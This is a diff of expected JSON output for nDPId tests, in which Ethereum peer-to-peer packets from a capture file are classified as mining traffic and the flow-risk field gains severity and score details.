+00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1342,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365461,"flow_last_seen":1578508365461,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1578508365461,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1343,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1578508365465,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508365465,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACsGNXy2oqE9wKgBuHZf3Ueh\/8nUB338R6ASOJDbwAAAAgQFrAQCCAo8EmDbItiWYAEDAwc="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1344,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1578508365465,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508365465,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGIITAqAG4tqKhPd1Hdl8HffxHof\/J1YAQECwxpAAAAQEICiLYl6U8EmDb"}
-00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1345,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365094,"flow_last_seen":1578508365466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":522,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":130,"midstream":0,"ts_msec":1578508365466,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"182.162.161.61","src_port":56647,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1345,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365094,"flow_last_seen":1578508365466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":522,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":130,"midstream":0,"ts_msec":1578508365466,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"182.162.161.61","src_port":56647,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1346,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1578508365485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508365485,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC0GVVKKS6u+wKgBuHZf3VEGdfqIHq1FlaAS\/og\/VgAAAgQFrAQCCAqkAfsSItiW0AEDAwc="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1347,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1578508365485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508365485,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGQlrAqAG4ikurvt1Rdl8erUWVBnX6iYAQECxbjgAAAQEICiLYl7mkAfsS"}
-00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1348,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365226,"flow_last_seen":1578508365487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":539,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":134,"midstream":0,"ts_msec":1578508365487,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.75.171.190","src_port":56657,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1348,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365226,"flow_last_seen":1578508365487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":539,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":134,"midstream":0,"ts_msec":1578508365487,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.75.171.190","src_port":56657,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1373,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365567,"flow_last_seen":1578508365567,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1578508365567,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"106.12.39.168","src_port":30303,"dst_port":30333,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1373,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1578508365567,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"ts_msec":1578508365567,"pkt":"EBMx8Tl2KDc3AG3ICABFAACcHIoAAEARCbPAqAG4agwnqHZfdn0AiGszdDnl2LgHwUzwnp\/NUaAjl2\/6ukAyoGtKBC9U9NcJJ2SSjY1bIBQONPG3UmfcMXvTBTN6oZMu6GXIBxr9UadDckfonN6CsHl3H7EBI7wV8mnDuf+AbUa\/i02tPDo+DL09AAHdBMuEfwAAAYJ2X4J2X8mEagwnqIJ2fYCEXhYgYQU="}
-00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1373,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365567,"flow_last_seen":1578508365567,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1578508365567,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"106.12.39.168","src_port":30303,"dst_port":30333,"l4_proto":"udp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1373,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365567,"flow_last_seen":1578508365567,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1578508365567,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"106.12.39.168","src_port":30303,"dst_port":30333,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1385,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365588,"flow_last_seen":1578508365588,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508365588,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":56670,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1385,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1578508365588,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1578508365588,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGVs\/AqAG4p1Z6Mt1edl9ccbjwAAAAALAC\/\/8vAQAAAgQFtAEDAwUBAQgKItiYGgAAAAAEAgAA"}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1386,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365592,"flow_last_seen":1578508365592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508365592,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"86.107.243.62","src_port":56671,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1386,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1578508365592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1578508365592,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGLq7AqAG4VmvzPt1fdl9sf4vVAAAAALAC\/\/8j6AAAAgQFtAEDAwUBAQgKItiYHgAAAAAEAgAA"}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1387,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1578508365593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508365593,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0AABAADQGeGsj5egTwKgBuHZf3VbzHyaM6OsJA4ASbvDSjgAAAgQFjAEBBAIBAwMH"}
 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1388,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1578508365593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1578508365593,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGbHfAqAG4I+XoE91Wdl\/o6wkD8x8mjVAQIABiKQAA"}
-00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1389,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365295,"flow_last_seen":1578508365594,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":435,"flow_tot_l4_payload_len":435,"flow_avg_l4_payload_len":108,"midstream":0,"ts_msec":1578508365594,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.229.232.19","src_port":56662,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1389,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365295,"flow_last_seen":1578508365594,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":435,"flow_tot_l4_payload_len":435,"flow_avg_l4_payload_len":108,"midstream":0,"ts_msec":1578508365594,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.229.232.19","src_port":56662,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1413,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1578508365619,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1578508365619,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGH3XAqAG4BQFT4t0xdl\/cLTE7AAAAALAC\/\/\/\/rwAAAgQFtAEDAwUBAQgKItiYNwAAAAAEAgAA"}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1414,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1578508365628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508365628,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACcGqoHKcBxqwKgBuHZf3U9YWyaeOLFgJqAScSDw0wAAAgQFrAQCCAonH\/CcItiWswEDAwg="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1415,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1578508365628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508365628,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGkYnAqAG4ynAcat1Pdl84sWAmWFsmn4AQECx\/AQAAAQEICiLYmD8nH\/Cc"}
-00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1416,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365194,"flow_last_seen":1578508365630,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":494,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1578508365630,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":56655,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1416,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365194,"flow_last_seen":1578508365630,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":494,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1578508365630,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":56655,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1417,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1578508365631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508365631,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGPLJWa\/M+wKgBuHZf3V\/moIrRbH+L1qAScSBDVwAAAgQFrAQCCApQzL4rItiYHgEDAwc="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1418,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":3,"flow_last_seen":1578508365631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508365631,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGLrrAqAG4VmvzPt1fdl9sf4vW5qCK0oAQECzS7AAAAQEICiLYmEFQzL4r"}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1419,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1578508365631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508365631,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGY9OnVnoywKgBuHZf3V5M8kZiXHG48aAScSAfsAAAAgQFrAQCCArTe0haItiYGgEDAwc="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1420,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1578508365631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508365631,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGVtvAqAG4p1Z6Mt1edl9ccbjxTPJGY4AQECyvQQAAAQEICiLYmEHTe0ha"}
-00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1421,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365592,"flow_last_seen":1578508365632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":135,"midstream":0,"ts_msec":1578508365632,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"86.107.243.62","src_port":56671,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1422,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365588,"flow_last_seen":1578508365633,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":389,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":97,"midstream":0,"ts_msec":1578508365633,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":56670,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1421,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365592,"flow_last_seen":1578508365632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":135,"midstream":0,"ts_msec":1578508365632,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"86.107.243.62","src_port":56671,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1422,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365588,"flow_last_seen":1578508365633,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":389,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":97,"midstream":0,"ts_msec":1578508365633,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":56670,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1463,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1578508365688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508365688,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAACwGI8Z82eu0wKgBuHZf3VfxiPe9S9oGI6AScSAoCwAAAgQFrAQCCArI+HIBItiXEAEDAwc="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1464,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1578508365688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508365688,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGD9bAqAG4fNnrtN1Xdl9L2gYj8Yj3voAQECy2XAAAAQEICiLYmHfI+HIB"}
-00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1465,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365300,"flow_last_seen":1578508365690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":545,"flow_tot_l4_payload_len":545,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1578508365690,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"124.217.235.180","src_port":56663,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1465,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365300,"flow_last_seen":1578508365690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":545,"flow_tot_l4_payload_len":545,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1578508365690,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"124.217.235.180","src_port":56663,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1484,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365701,"flow_last_seen":1578508365701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508365701,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"139.162.255.210","src_port":56672,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1484,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1578508365701,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1578508365701,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG7OLAqAG4i6L\/0t1gdl\/B\/P6FAAAAALAC\/\/8ZigAAAgQFtAEDAwUBAQgKItiYggAAAAAEAgAA"}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1517,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365712,"flow_last_seen":1578508365712,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508365712,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"78.47.147.155","src_port":56673,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -297,19 +297,19 @@
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1536,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1578508365741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1578508365741,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG4nHAqAG4XkQ3ot1idl9YCAHzAAAAALAC\/\/91dwAAAgQFtAEDAwUBAQgKItiYqQAAAAAEAgAA"}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1539,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1578508365742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508365742,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIG+uaLov\/SwKgBuHZf3WDeocLiwfz+hqAS\/ogDJwAAAgQFrAQCCArjm6OzItiYggEDAwc="}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1540,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1578508365742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508365742,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG7O7AqAG4i6L\/0t1gdl\/B\/P6G3qHC44AQECwgIAAAAQEICiLYmKrjm6Oz"}
